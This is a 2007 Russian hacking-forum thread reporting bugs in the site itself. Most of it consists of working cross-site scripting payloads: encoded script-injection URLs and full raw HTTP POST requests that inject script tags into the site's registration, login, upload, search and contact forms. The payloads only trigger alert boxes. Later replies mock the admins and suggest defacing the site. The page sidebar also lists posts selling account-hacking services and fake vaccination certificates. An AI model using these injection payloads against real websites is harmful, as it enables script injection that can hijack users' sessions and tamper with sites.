CASINOJOY - Ставка На Успех! Проверь Свою Удачу!


Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - BUGS
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Портал / Для тестов RSS подписка на сообщения с форума Subscribe
Форум будет удален по завершению этапа тестирования сайта

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 6216
BUGS
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
# | Сообщение добавлено 11.01.2007 14:06:09
-------------
-------------
http://www.hackzone.ru/forum/?a=search&fid=7&q=%22%27%3E%3Cscript%3Ealert%28%2FTesting%2F%29%3C%2Fscript%3E%3Cfont%20color=re
 
d%20size=9%3E%3Ccenter%3E%3Cb%3EГХМ(=%3C/b%3E%3C/center%3E%3C/font%3E&period=30
-------------
-------------
http://www.hackzone.ru/tools/proxy/?a=check&pip=%22%27%3E%3Cscript%3Ealert%28%2FTESTING%2F%29%3C%2Fscript%3E&pop=
-------------
-------------
http://www.hackzone.ru/adv/?email=%22'%3E%3Cscript%3Ealert(/TESTING/)%3C/script%3E&name=%22'%3E%3Cscript%3Ealert(/TESTING/)%3
 
C/script%3E
-------------
-------------
http://www.hackzone.ru/cont/?name=%22%27%3E%3Cscript%3Ealert%28%2FTESTING%2F%29%3C%2Fscript%3E&email=&msg=&btn=+%CE%F2%EF%F0%
 
E0%E2%E8%F2%FC+
-------------
-------------
http://www.hackzone.ru/tools/apg/
 
POST /tools/apg/ HTTP/1.1
Host: www.hackzone.ru
User-Agent: Googlebot/2.1 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.hackzone.ru/
Cookie: hotlog=0; memb_id=0; sess_id=0
Content-Type: application/x-www-form-urlencoded
 
algo=1&cl=y&clseed=%22'%3E%3Cscript%3Ealert(%2FTesting%2F)%3C%2Fscript%3E&maxpasslength=10&minpasslength=6&nb=y&numofpass=10&
 
sl=y&ss=n
-------------
-------------
http://www.hackzone.ru/memb/
 
POST /memb/ HTTP/1.1
Host: www.hackzone.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.hackzone.ru/
Cookie: hotlog=0; memb_id=0; sess_id=0
Content-Type: application/x-www-form-urlencoded
 
a=do_reg&login=%22%27%3E%3Cscript%3Ealert%28%2FTESTING%2F%29%3C%2Fscript%3E&pass1=&pass2=&name=%22%27%3E%3Cscript%3Ealert%28%
 
2FTESTING%2F%29%3C%2Fscript%3E&bd=1&bm=1&by=1947&email=%22%27%3E%3Cscript%3Ealert%28%2FTESTING%2F%29%3C%2Fscript%3E&url=%22%2
 
7%3E%3Cscript%3Ealert%28%2FTESTING%2F%29%3C%2Fscript%3E&icq=%22%27%3E%3Cscript%3Ealert%28%2FTESTING%2F%29%3C%2Fscript%3E&aim=
 
%22%27%3E%3Cscript%3Ealert%28%2FTESTING%2F%29%3C%2Fscript%3E&msn=%22%27%3E%3Cscript%3Ealert%28%2FTESTING%2F%29%3C%2Fscript%3E
 
&yahoo=%22%27%3E%3Cscript%3Ealert%28%2FTESTING%2F%29%3C%2Fscript%3E
-------------
-------------
http://www.hackzone.ru/memb/
 
POST /memb/ HTTP/1.1
Host: www.hackzone.ru
User-Agent: Googlebot/2.1 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.hackzone.ru/
Cookie: hotlog=0; memb_id=0; sess_id=0
Content-Type: application/x-www-form-urlencoded
 

a=cp&act=sites&code=upd&uid=0&url=http%3A%2F%2F&title=&descr=&cat_id=22&hidden_info=%22%27%3E%3C%2Ftextarea%3E%3Cscript%3Eale
 
rt%28%2FTESTING%2F%29%3C%2Fscript%3E
-------------
-------------
Сказать спасибо Ответить Цитировать

tester




Novice
# | Сообщение добавлено 11.01.2007 14:30:35
Отредактировано 2007-01-29 14:27:58 by tester
-------------
-------------
http://www.hackzone.ru/files/
 
POST /files/ HTTP/1.1
Host: www.hackzone.ru
User-Agent: Googlebot/2.1 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.hackzone.ru/files/
Cookie: hotlog=0; memb_id=0; sess_id=0
Content-Type: multipart/form-data; boundary=---------------------------187161971819895
-----------------------------187161971819895
Content-Disposition: form-data; name="a"
 
doupload
-----------------------------187161971819895
Content-Disposition: form-data; name="cat_id"
 
12
-----------------------------187161971819895
Content-Disposition: form-data; name="title"
 

-----------------------------187161971819895
Content-Disposition: form-data; name="descr"
 
"&apos;></textarea><script>alert(/TESTING/)</script>
-----------------------------187161971819895
Content-Disposition: form-data; name="flz"; filename=""
Content-Type: application/octet-stream
 

-----------------------------187161971819895
Content-Disposition: form-data; name="os"
 
"&apos;><script>alert(/TESTING/)</script>
-----------------------------187161971819895
Content-Disposition: form-data; name="link"
 
"&apos;><script>alert(/TESTING/)</script>
-----------------------------187161971819895
Content-Disposition: form-data; name="author"
 
"&apos;><script>alert(/TESTING/)</script>
-----------------------------187161971819895--
-------------
-------------
http://www.hackzone.ru/memb/?a=do_login&bwurl=/&login=%22%3E%3Cscript%3Ealert(/TESTING/)%3C/script%3E&pass=&rnd=119589
-------------
-------------
http://www.hackzone.ru/forum/index.php?a=post&fid=1&pid=0&page=1&subj=&msg=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2FTESTING%2F%29%3C%2Fscript%3E
Сказать спасибо Ответить Цитировать

Soviet'чик


Novice
# | Сообщение добавлено 11.01.2007 15:21:29
Кипер молодца =)
 
Админы, скажите, а перед релизом потестить не судьба была, или вы не волокёте?
Сказать спасибо Ответить Цитировать

# | Сообщение добавлено 13.01.2007 13:29:46
Кароче надо дефейснуть эту муть, тогда зашевелятся...)
Сказать спасибо Ответить Цитировать

Engel


Silver Member
# | Сообщение добавлено 16.01.2007 06:59:25
Отредактировано 2007-01-29 11:26:38 by DiMan
На ошибках учатся!
Адмы мля, пропатчите сайт,а то у вас здесь xss немерено!
А то мля мзда вам будет!
МЗда,МЗда,МЗда,МЗда,МЗда,МЗда,
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Баг в Safari приводит к утечке данных
  • В Darknet закрывается кардерский маркетплейс UniCC
  • Хакеры взломали украинские правительственные сайты
  • Уязвимость на diia.gov.ua
  • Опубликован бесплатный дешифратор для вымогателя BlackByte
  • Zerodium покупает уязвимости в ExpressVPN, NordVPN и Surfshark
  • За взломом сайтов REvil стояли правоохранительные органы
  • Уязвимость ProxyToken позволяет воровать почту через Microsoft Ex...
  • T-Mobile взломали через уязвимый роутер
  • Ботнет Phorpiex прекратил работу, его исходный код выставлен на п...

    Все новости... Все статьи... Прислать новость RSS
  • Взлом и безопасность / Новичкам » вавада приложение
  • Взлом и безопасность / Программы » Купить QR код/сертификат о вакцинации против COVID-19
  • Взлом и безопасность / Программы » Услуги взлома социальных сетей от
  • Разное / Болталка » Re: Форум жив?
  • Разное / Болталка » Форум жив?
  • Разное / Болталка » С Новым 2022 Годом!
  • Взлом и безопасность / Программы » Re: Hasp ключ для ABC-4
  • Портал / Отзывы и предложения » Предлагаем партнерство вашему форуму.
  • Разное / Предложения работы » взлом почты
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}